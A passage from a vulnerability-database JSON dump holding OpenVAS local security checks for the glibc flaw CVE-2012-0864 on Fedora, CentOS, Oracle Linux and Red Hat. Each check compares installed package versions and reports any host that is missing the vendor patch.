Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863924\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:48 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-2162\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2162\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.90~24.fc16.6\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2017-12-27T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:863924", "href": "http://plugins.openvas.org/nasl.php?oid=863924", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2162\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 16\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\");\n script_id(863924);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:48 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-2162\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2162\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.90~24.fc16.6\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-04T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881169", "href": "http://plugins.openvas.org/nasl.php?oid=881169", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0393 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0393 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n \n This update also fixes the following bugs:\n \n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n \n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n \n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. 
(BZ#799259)\n \n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\");\n script_id(881169);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:18 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0393\");\n script_name(\"CentOS Update for glibc CESA-2012:0393 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", 
rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Oracle Linux Local Security Checks ELSA-2012-0397", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123951", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0397", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0397.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the 
Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123951\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:44 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0397\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0397 - glibc security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0397\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0397.html\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n 
security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "OPENVAS:863764", "href": "http://plugins.openvas.org/nasl.php?oid=863764", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2144", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 15\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. 
This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074691.html\");\n script_id(863764);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-09 10:25:29 +0530 (Fri, 09 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-2144\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2144\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.1~6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, 
"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the 'glibc' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881113", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0397 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0397 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-March/018506.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881113\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:10:49 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0397\");\n script_name(\"CentOS Update for glibc CESA-2012:0397 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. 
This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-02T00:00:00", "published": "2012-03-22T00:00:00", "id": "OPENVAS:870576", "href": 
"http://plugins.openvas.org/nasl.php?oid=870576", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0397-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0397-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00013.html\");\n script_id(870576);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-22 10:42:41 +0530 (Thu, 22 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0397-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0397-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:58:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-03T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:870673", "href": "http://plugins.openvas.org/nasl.php?oid=870673", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0393-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0393-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
